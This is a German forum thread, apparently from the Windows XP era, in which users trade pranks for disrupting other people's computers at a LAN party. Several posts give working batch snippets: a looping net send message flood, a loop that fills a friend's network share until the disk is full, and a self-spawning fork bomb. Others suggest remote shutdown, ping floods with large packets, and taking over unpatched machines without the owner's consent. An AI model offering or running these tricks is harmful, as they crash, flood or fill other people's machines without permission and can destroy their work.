Fieses auf einer Lanparty

Status
Nicht offen für weitere Antworten.

Irgendjemand_1

Erfahrenes Mitglied
Huhu.

Was könnte man auf ner Lanparty schön fieses im Netzwerk anstellen, was die anderen nervt?
Code:
:a
net send ...
goto a
ist ja Standard. Aber irgendwie ist das irgendwann auch mal langweilig, kennt ihr was nettes? :D

Betriebssystem wird wohl hauptsächlich Win XP sein
 
Man kann den Befehl shutdown auch remote verwenden. :)
Ansonsten machen sich waehrend dem Zocken auch schnelle Pings mit grossen Paketen gut.

Aber eigentlich sollte man sowas ja nicht unbedingt machen.

Wir haben mal auf einem Lehrgang ein net send * abgeschickt weil wir unseren Dozenten vermisst haben. Meine Guete war der Sauer. :)
 
Ich weiss nicht mehr wie das genau geht.
Merk gerade, dass mein Win2K den Befehl nicht kennt.

Evtl. wirst Du ein Admin-Passwort brauchen, aber sowas haben die meisten XP-User ja eh nicht.
 
Hi.

Wenn dein gegenüber am Pc nicht zustimmen müsst könnst ja mit dem Remoting-Assistent seinen Pc ganz übernehmen.. Kriegt Man bestimmt auch irgendwie hin..


MfG Alexander12
 
Ha, da fällt mir was ein, damals hab ich meinem Freund die Festplatte vollgeschrieben:
Code:
@echo off
cls
C:
:neu
dir /s /b>>\\Computer\Freigabe
goto neu
/Edit Bald ist meine nächste LAN-Party, der gleiche Freund wird auch kommen, deshalb werde ich dieses Thema mal weiter verfolgen... Nicht das ich böse Absichten hätte oder so! :suspekt:
:) :) :)
 
Zuletzt bearbeitet:
Man ihr habt ja was vor :)

Es gibt viele Tools im Netz mit denen du XP und 2000 PCs ziemlich heftig vernsteuern kannst und zwar OHNE vorher etwas auf ihnen zu installieren, klappt natürlich nur bie PCs die nicht so heftig gepatcht sind. Also von Programme aufrufen über Prozesse killen und PC runterfahren geht alles.

Greetz..
Sinac
 
Was auch lustig ist, falls du mal kurz an seinen PC darfst:
Code:
:a
@echo off
start hohoho.cmd
goto a
..die Datei dann "hohoho.cmd" nennen und starten ;)
 
@Sinac
So etwas habe ich schon lange vergeblich gesucht, kannst du mir ein paar Beispiele nennen? Ich glaube, den Rest interessiert das auch :)
 
Status
Nicht offen für weitere Antworten.
Zurück